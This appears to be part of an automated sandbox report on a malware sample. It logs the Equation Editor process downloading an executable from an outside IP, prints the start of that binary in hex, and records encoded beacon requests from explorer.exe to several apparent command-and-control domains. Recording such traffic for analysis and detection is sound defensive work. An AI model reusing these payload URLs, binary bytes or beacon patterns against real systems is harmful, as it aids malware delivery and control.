Jan 13, 2021 17:18:46.362189054 CET	80	49166	34.102.136.180	192.168.2.22
Jan 13, 2021 17:18:46.362289906 CET	49166	80	192.168.2.22	34.102.136.180
Jan 13, 2021 17:18:46.362503052 CET	49166	80	192.168.2.22	34.102.136.180
Jan 13, 2021 17:18:46.402690887 CET	80	49166	34.102.136.180	192.168.2.22
Jan 13, 2021 17:18:46.505367994 CET	80	49166	34.102.136.180	192.168.2.22
Jan 13, 2021 17:18:46.505462885 CET	80	49166	34.102.136.180	192.168.2.22
Jan 13, 2021 17:18:46.505655050 CET	49166	80	192.168.2.22	34.102.136.180
Jan 13, 2021 17:18:46.505755901 CET	49166	80	192.168.2.22	34.102.136.180
Jan 13, 2021 17:18:46.545870066 CET	80	49166	34.102.136.180	192.168.2.22
Jan 13, 2021 17:18:51.588623047 CET	49167	80	192.168.2.22	35.246.6.109
Jan 13, 2021 17:18:51.649804115 CET	80	49167	35.246.6.109	192.168.2.22
Jan 13, 2021 17:18:51.649971008 CET	49167	80	192.168.2.22	35.246.6.109
Jan 13, 2021 17:18:51.650290012 CET	49167	80	192.168.2.22	35.246.6.109
Jan 13, 2021 17:18:51.711249113 CET	80	49167	35.246.6.109	192.168.2.22
Jan 13, 2021 17:18:51.764666080 CET	80	49167	35.246.6.109	192.168.2.22
Jan 13, 2021 17:18:51.764695883 CET	80	49167	35.246.6.109	192.168.2.22
Jan 13, 2021 17:18:51.764967918 CET	49167	80	192.168.2.22	35.246.6.109
Jan 13, 2021 17:18:51.765014887 CET	49167	80	192.168.2.22	35.246.6.109
Jan 13, 2021 17:18:51.825685978 CET	80	49167	35.246.6.109	192.168.2.22
Jan 13, 2021 17:18:57.173888922 CET	49168	80	192.168.2.22	54.254.26.94
Jan 13, 2021 17:18:57.356821060 CET	80	49168	54.254.26.94	192.168.2.22
Jan 13, 2021 17:18:57.357038975 CET	49168	80	192.168.2.22	54.254.26.94
Jan 13, 2021 17:18:57.357280016 CET	49168	80	192.168.2.22	54.254.26.94
Jan 13, 2021 17:18:57.540438890 CET	80	49168	54.254.26.94	192.168.2.22
Jan 13, 2021 17:18:57.540673018 CET	80	49168	54.254.26.94	192.168.2.22
Jan 13, 2021 17:18:57.540685892 CET	80	49168	54.254.26.94	192.168.2.22
Jan 13, 2021 17:18:57.540872097 CET	49168	80	192.168.2.22	54.254.26.94
Jan 13, 2021 17:18:57.540965080 CET	49168	80	192.168.2.22	54.254.26.94
Jan 13, 2021 17:18:57.723292112 CET	80	49168	54.254.26.94	192.168.2.22
Jan 13, 2021 17:19:07.727129936 CET	49169	80	192.168.2.22	199.34.228.73
Jan 13, 2021 17:19:07.911875010 CET	80	49169	199.34.228.73	192.168.2.22
Jan 13, 2021 17:19:07.912043095 CET	49169	80	192.168.2.22	199.34.228.73
Jan 13, 2021 17:19:07.912416935 CET	49169	80	192.168.2.22	199.34.228.73
Jan 13, 2021 17:19:08.094832897 CET	80	49169	199.34.228.73	192.168.2.22
Jan 13, 2021 17:19:08.103316069 CET	80	49169	199.34.228.73	192.168.2.22
Jan 13, 2021 17:19:08.103368044 CET	80	49169	199.34.228.73	192.168.2.22
Jan 13, 2021 17:19:08.103406906 CET	80	49169	199.34.228.73	192.168.2.22
Jan 13, 2021 17:19:08.103434086 CET	80	49169	199.34.228.73	192.168.2.22
Jan 13, 2021 17:19:08.103472948 CET	80	49169	199.34.228.73	192.168.2.22
Jan 13, 2021 17:19:08.103691101 CET	49169	80	192.168.2.22	199.34.228.73
Jan 13, 2021 17:19:08.103893995 CET	49169	80	192.168.2.22	199.34.228.73
Jan 13, 2021 17:19:13.236645937 CET	49170	80	192.168.2.22	94.73.146.42
Jan 13, 2021 17:19:13.314860106 CET	80	49170	94.73.146.42	192.168.2.22
Jan 13, 2021 17:19:13.314937115 CET	49170	80	192.168.2.22	94.73.146.42
Jan 13, 2021 17:19:13.315119028 CET	49170	80	192.168.2.22	94.73.146.42
Jan 13, 2021 17:19:13.394064903 CET	80	49170	94.73.146.42	192.168.2.22
Jan 13, 2021 17:19:13.394834995 CET	80	49170	94.73.146.42	192.168.2.22
Jan 13, 2021 17:19:13.394875050 CET	80	49170	94.73.146.42	192.168.2.22
Jan 13, 2021 17:19:13.394913912 CET	80	49170	94.73.146.42	192.168.2.22
Jan 13, 2021 17:19:13.395210981 CET	49170	80	192.168.2.22	94.73.146.42
Jan 13, 2021 17:19:13.395334959 CET	49170	80	192.168.2.22	94.73.146.42
Jan 13, 2021 17:19:13.403754950 CET	80	49170	94.73.146.42	192.168.2.22
Jan 13, 2021 17:19:13.403911114 CET	49170	80	192.168.2.22	94.73.146.42
Jan 13, 2021 17:19:13.473293066 CET	80	49170	94.73.146.42	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 17:18:41.151473999 CET	52197	53	192.168.2.22	8.8.8.8
Jan 13, 2021 17:18:41.232903957 CET	53	52197	8.8.8.8	192.168.2.22
Jan 13, 2021 17:18:46.257308960 CET	53099	53	192.168.2.22	8.8.8.8
Jan 13, 2021 17:18:46.320647955 CET	53	53099	8.8.8.8	192.168.2.22
Jan 13, 2021 17:18:51.518246889 CET	52838	53	192.168.2.22	8.8.8.8
Jan 13, 2021 17:18:51.587101936 CET	53	52838	8.8.8.8	192.168.2.22
Jan 13, 2021 17:18:56.803368092 CET	61200	53	192.168.2.22	8.8.8.8
Jan 13, 2021 17:18:57.172599077 CET	53	61200	8.8.8.8	192.168.2.22
Jan 13, 2021 17:19:07.553488016 CET	49548	53	192.168.2.22	8.8.8.8
Jan 13, 2021 17:19:07.725017071 CET	53	49548	8.8.8.8	192.168.2.22
Jan 13, 2021 17:19:13.132663012 CET	55627	53	192.168.2.22	8.8.8.8
Jan 13, 2021 17:19:13.234622955 CET	53	55627	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 17:18:41.151473999 CET	192.168.2.22	8.8.8.8	0xccff	Standard query (0)	www.yjpps.com	A (IP address)	IN (0x0001)
Jan 13, 2021 17:18:46.257308960 CET	192.168.2.22	8.8.8.8	0x2e78	Standard query (0)	www.gdsjgf.com	A (IP address)	IN (0x0001)
Jan 13, 2021 17:18:51.518246889 CET	192.168.2.22	8.8.8.8	0x2f03	Standard query (0)	www.thepoetrictedstudio.com	A (IP address)	IN (0x0001)
Jan 13, 2021 17:18:56.803368092 CET	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.tuvandadayvitos24h.online	A (IP address)	IN (0x0001)
Jan 13, 2021 17:19:07.553488016 CET	192.168.2.22	8.8.8.8	0x6ec7	Standard query (0)	www.acdfr.com	A (IP address)	IN (0x0001)
Jan 13, 2021 17:19:13.132663012 CET	192.168.2.22	8.8.8.8	0xf09a	Standard query (0)	www.h2oturkiye.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 17:18:41.232903957 CET	8.8.8.8	192.168.2.22	0xccff	No error (0)	www.yjpps.com		0.0.0.0	A (IP address)	IN (0x0001)
Jan 13, 2021 17:18:46.320647955 CET	8.8.8.8	192.168.2.22	0x2e78	No error (0)	www.gdsjgf.com	gdsjgf.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 17:18:46.320647955 CET	8.8.8.8	192.168.2.22	0x2e78	No error (0)	gdsjgf.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 17:18:51.587101936 CET	8.8.8.8	192.168.2.22	0x2f03	No error (0)	www.thepoetrictedstudio.com	www110.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 17:18:51.587101936 CET	8.8.8.8	192.168.2.22	0x2f03	No error (0)	www110.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 17:18:51.587101936 CET	8.8.8.8	192.168.2.22	0x2f03	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 17:18:51.587101936 CET	8.8.8.8	192.168.2.22	0x2f03	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 17:18:51.587101936 CET	8.8.8.8	192.168.2.22	0x2f03	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Jan 13, 2021 17:18:57.172599077 CET	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	www.tuvandadayvitos24h.online	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 17:18:57.172599077 CET	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	dns.ladipage.com	ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 17:18:57.172599077 CET	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com		54.254.26.94	A (IP address)	IN (0x0001)
Jan 13, 2021 17:18:57.172599077 CET	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com		52.221.6.123	A (IP address)	IN (0x0001)
Jan 13, 2021 17:18:57.172599077 CET	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com		13.251.251.159	A (IP address)	IN (0x0001)
Jan 13, 2021 17:19:07.725017071 CET	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	www.acdfr.com		199.34.228.73	A (IP address)	IN (0x0001)
Jan 13, 2021 17:19:13.234622955 CET	8.8.8.8	192.168.2.22	0xf09a	No error (0)	www.h2oturkiye.com	h2oturkiye.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 17:19:13.234622955 CET	8.8.8.8	192.168.2.22	0xf09a	No error (0)	h2oturkiye.com		94.73.146.42	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

18.195.87.136

www.gdsjgf.com

www.thepoetrictedstudio.com

www.tuvandadayvitos24h.online

www.acdfr.com

www.h2oturkiye.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	18.195.87.136	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 17:17:31.650222063 CET	0	OUT	GET /ttkkz/file2.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 18.195.87.136 Connection: Keep-Alive
Jan 13, 2021 17:17:31.691555023 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 13 Jan 2021 16:17:28 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 Last-Modified: Wed, 13 Jan 2021 09:32:43 GMT ETag: "ce400-5b8c4d239f0b9" Accept-Ranges: bytes Content-Length: 844800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 63 bd fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 da 0c 00 00 08 00 00 00 00 00 00 ce f8 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 f8 0c 00 4b 00 00 00 00 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 d8 0c 00 00 20 00 00 00 da 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0d 00 00 06 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 e2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f8 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 3e 0b 00 88 b9 01 00 03 00 00 00 43 01 00 06 68 36 02 00 90 08 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 2b 02 26 16 02 28 01 00 00 0a 2a 36 2b 02 26 16 00 02 28 04 00 00 0a 00 2a 00 00 13 30 03 00 12 01 00 00 01 00 00 11 fe 09 00 00 fe 0e 00 00 fe 0c 00 00 20 2b f3 88 0a 20 96 b2 41 ee 58 20 2a a0 25 08 59 20 87 05 a5 f0 61 20 02 00 00 00 63 3b 68 00 00 00 fe 0c 00 00 20 e1 68 eb e3 20 e9 68 eb e3 61 59 45 04 00 00 00 5f 00 00 00 2a 00 00 00 a1 00 00 00 52 00 00 00 fe 0c 00 00 20 fe 73 c8 26 65 20 66 8c 37 d9 59 20 02 00 00 00 63 66 59 45 02 00 00 00 64 00 00 00 4c 00 00 00 38 77 00 00 00 20 44 78 c5 1e 65 20 23 a7 e4 e1 61 20 5d df 21 ff 58 20 01 00 00 00 63 2a 20 2b 0e 54 1b 65 66 65 20 db f1 ab e4 59 2a 20 0b 00 00 00 66 20 01 00 00 00 63 2a 20 c7 ef eb 2e 20 ce c8 4e 09 59 20 06 d9 62 da 58 2a 20 03 49 7e 12 20 2a 68 99 eb 61 20 e1 4d dc dc 58 20 f2 90 3c 29 61 2a 20 18 75 52 ea 20 65 ff c1 fc 59 20 3e 39 9f 0f 61 20 9c 4c 0f e2 59 2a 20 19 b6 66 1f 20 98 fb 6f 12 59 20 da c0 ea e1 61 20 2f a3 db 09 58 20 8b 1d f8 f6 59 2a 00 00 13 30 02 00 e9 00 00 00 02 00 00 11 2b 02 26 16 00 73 06 00 00 0a 80 01 00 00 04 2b 46 06 1f 21 61 0a 2b 0f 07 1f 26 61 38 a7 00 00 00 07 1f 26 58 2b 40 1f 17 28 3d 00 00 06 0b 2b e7 06 1f 2e 59 45 06 00 00 00 38 00 00 00 4a 00 00 00 5c 00 00 00 6e 00 00 00 84 00 00 00 96 00 00 00 1f fd 0b 2b c1 1f 13 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc_P @ @@K H.text `.rsrc@@.reloc @BH>Ch6.+&(6+&(0 + AX %Y a c;h h haYE_R s&e f7Y cfYEdL8w Dxe #a ]!X c* +Tefe Y* f c* . NY bX* I~ ha MX <)a uR eY >9a LY* f oY a /X Y*0+&s+F!a+&a8&X+@(=+.YE8J\n+
Jan 13, 2021 17:17:31.691584110 CET	3	IN	Data Raw: 0a 1f fb 0b 2b b9 d0 08 00 00 06 26 2b 17 45 04 00 00 00 b5 ff ff ff db ff ff ff e3 ff ff ff 0c 00 00 00 2b a9 1f 0b 28 03 00 00 06 0b 2b 90 2b 87 73 07 00 00 0a 80 03 00 00 04 1f 11 0a 38 75 ff ff ff 73 08 00 00 0a 80 05 00 00 04 1f 12 0a 38 63 Data Ascii: +&+E+(++s8us8cs8Q&+8S8;s8)0+&+Aa++a8~(Y+L+&+-XED_+(+
Jan 13, 2021 17:17:31.691596031 CET	4	IN	Data Raw: 00 0a 13 06 11 06 11 04 6f 1d 00 00 0a 73 1f 00 00 0a 7a 00 7e 06 00 00 04 d0 06 00 00 1b 28 15 00 00 0a 6f 20 00 00 0a 00 dc 00 02 0a 2b 00 06 2a 01 1c 00 00 01 00 c2 00 0c fd 00 31 ce 00 00 00 02 00 c2 00 6c 2e 01 17 00 00 00 00 13 30 02 00 ac Data Ascii: osz~(o +*1l.0+&+@a+a8Y+Z+&+XE$Rh+(++(+o!+E+8s%
Jan 13, 2021 17:17:31.691620111 CET	5	IN	Data Raw: 00 00 00 00 00 00 00 2b 02 26 16 03 02 7b 07 00 00 04 fe 01 2b 14 16 2b 03 17 2b 00 2d 02 2b 2d 03 14 fe 03 2c 02 2b 06 2b 07 2c ed 2b e8 16 2b 03 17 2b 00 2d 0b 72 71 00 00 70 73 27 00 00 0a 7a 02 02 7c 07 00 00 04 28 0d 00 00 2b 2a 00 03 30 02 Data Ascii: +&{+++-+-,++,+++-rqps'z\|(+0G+&{+++-+-,++,+++-rqps'z\|(+0G+&{+++-+-,++,+++-rqps'z\|(
Jan 13, 2021 17:17:31.732214928 CET	7	IN	Data Raw: 03 00 00 06 0b 1f 0c 0c 2b d6 07 1f 0b 58 45 04 00 00 00 06 00 00 00 0d 00 00 00 31 00 00 00 49 00 00 00 18 0c 2b b9 2b b0 2b 41 1f f5 0b 2b a9 d0 2c 00 00 06 26 2b 17 45 04 00 00 00 a6 ff ff ff b0 ff ff ff bd ff ff ff da ff ff ff 2b a0 1f fb 0b Data Ascii: +XE1I+++A+,&+E++(++8m0+&+a+a8~Y+L+(+&+XE;Q+++H+(&+E
Jan 13, 2021 17:17:31.732251883 CET	8	IN	Data Raw: a2 d0 38 00 00 06 26 18 0c 2b 98 28 35 00 00 06 72 33 01 00 70 7e 16 00 00 04 6f 31 00 00 0a 28 23 00 00 0a 0b 2b 1a 45 04 00 00 00 8a ff ff ff 91 ff ff ff 9c ff ff ff c3 ff ff ff 38 7b ff ff ff 1f 0d 0c 38 5a ff ff ff 2b 1f 1f 0e 0c 38 50 ff ff Data Ascii: 8&+(5r3p~o1(#+E8{8Z+8Pt"+8Q89f+&s:(2t.+&(30+&~+0+&(;+*0 x xYe
Jan 13, 2021 17:17:31.732274055 CET	10	IN	Data Raw: 02 1e 7d 38 00 00 04 1f fb 0a 38 20 ff ff ff d0 7f 00 00 06 26 1f fa 0a 38 12 ff ff ff 02 1e 7d 39 00 00 04 1e 28 03 00 00 06 0a 38 ff fe ff ff 02 1e 7d 35 00 00 04 1f fe 0a 38 f0 fe ff ff 02 28 41 00 00 06 1f e7 0a 38 e2 fe ff ff 02 1e 7d 37 00 Data Ascii: }88 &8}9(8}58(A8}7+888};+(888*0+&8++-{88,++:+]a+aXE8?
Jan 13, 2021 17:17:31.732295990 CET	11	IN	Data Raw: 4a 00 00 06 18 6f 4b 00 00 0a 00 02 6f 4a 00 00 06 72 c1 01 00 70 22 00 00 04 41 73 4c 00 00 0a 6f 4d 00 00 0a 00 02 6f 4a 00 00 06 1f 28 1f 56 73 3f 00 00 0a 6f 40 00 00 0a 1f 3f 0b 38 29 fc ff ff 02 6f 66 00 00 06 20 43 01 00 00 1f 37 73 42 00 Data Ascii: JoKoJrp"AsLoMoJ(Vs?o@?8)of C7sBoC+j7a6XE(FO]{+4B`~(+ohoIoLoJ8nof
Jan 13, 2021 17:17:31.732320070 CET	13	IN	Data Raw: ff 00 02 6f 44 00 00 06 72 47 02 00 70 6f 45 00 00 0a 00 02 6f 44 00 00 06 17 6f 46 00 00 0a 00 02 6f 46 00 00 06 18 6f 4b 00 00 0a 00 02 6f 46 00 00 06 72 c1 01 00 70 22 00 00 04 41 73 4c 00 00 0a 6f 4d 00 00 0a 00 02 6f 46 00 00 06 1f 28 1f 7e Data Ascii: oDrGpoEoDoFoFoKoFrp"AsLoMoF(~s?o@oFrpoAoFZsBoCoFoDoFrpoNoFoO8zoRsBoCoRoDoRrGpoEoRo
Jan 13, 2021 17:17:31.732345104 CET	14	IN	Data Raw: ff 02 73 3c 00 00 0a 6f 57 00 00 06 00 02 73 3c 00 00 0a 6f 59 00 00 06 00 02 73 3c 00 00 0a 6f 5b 00 00 06 00 02 73 3c 00 00 0a 6f 5d 00 00 06 00 02 73 3c 00 00 0a 6f 5f 00 00 06 00 02 73 3c 00 00 0a 6f 61 00 00 06 00 02 73 3c 00 00 0a 6f 63 00 Data Ascii: s<oWs<oYs<o[s<o]s<o_s<oas<ocs<oesTogs`ois`ok8loLoDoLr%poNoLoOoNoKoNrp"AsLoMoN(.s?o@
Jan 13, 2021 17:17:31.732368946 CET	15	IN	Data Raw: f5 ff ff 04 f6 ff ff c8 f6 ff ff b6 f7 ff ff 74 f8 ff ff 06 f9 ff ff c5 f9 ff ff 88 fa ff ff 12 fb ff ff d5 fb ff ff 7f fc ff ff 30 fd ff ff e4 fd ff ff a7 fe ff ff b5 fe ff ff 88 ff ff ff 38 8b ec ff ff 02 28 5f 00 00 0a 2b 06 0b 38 74 ec ff ff Data Ascii: t08(_+8t6+&{+0Y+&{s6{+-+++-om}{+,+,+++++-on6+&{+0Y+&\|s6

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 17:18:46.362503052 CET	896	OUT	GET /bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1 Host: www.gdsjgf.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 17:18:46.505367994 CET	896	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 16:18:46 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc838f-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 17:18:51.650290012 CET	897	OUT	GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G/ZSF//8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg== HTTP/1.1 Host: www.thepoetrictedstudio.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 17:18:51.764666080 CET	898	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Jan 2021 16:18:51 GMT Content-Length: 0 Connection: close location: https://www.thepoetrictedstudio.com/bw82?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G%2FZSF%2F%2F8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg%3D%3D strict-transport-security: max-age=120 x-wix-request-id: 1610554731.697213906798116351 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVj1ELE/lLKFr64HWuKhttT6,2d58ifebGbosy5xc+FRalrPbNrLr/ZtO31LD87Zthe126WDD8o9ZiHxHjBUuCAelGgqFbFMYwiXnFojPwdof6MAtvdQKQ4UViTbgkd6B4HQ=,2UNV7KOq4oGjA5+PKsX47F8xRgV30iIDzySL0NmaUxo=,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,l7Ey5khejq81S7sxGe5Nk0OLkV42e4Sos6vJ9PulJHGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,ywkbhDzHLtjhjmon1ohv942vcDqd9yFUNOGqkGQj/jyb1qw14fPlsJ3/2N4iWrg7iy9RDN50yNDYuMRjpFglRg== Cache-Control: no-cache Expires: -1 Server: Pepyaka/1.19.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49168	54.254.26.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 17:18:57.357280016 CET	899	OUT	GET /bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1 Host: www.tuvandadayvitos24h.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 17:18:57.540673018 CET	900	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 13 Jan 2021 16:18:57 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.tuvandadayvitos24h.online/bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49169	199.34.228.73	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 17:19:07.912416935 CET	901	OUT	GET /bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1 Host: www.acdfr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
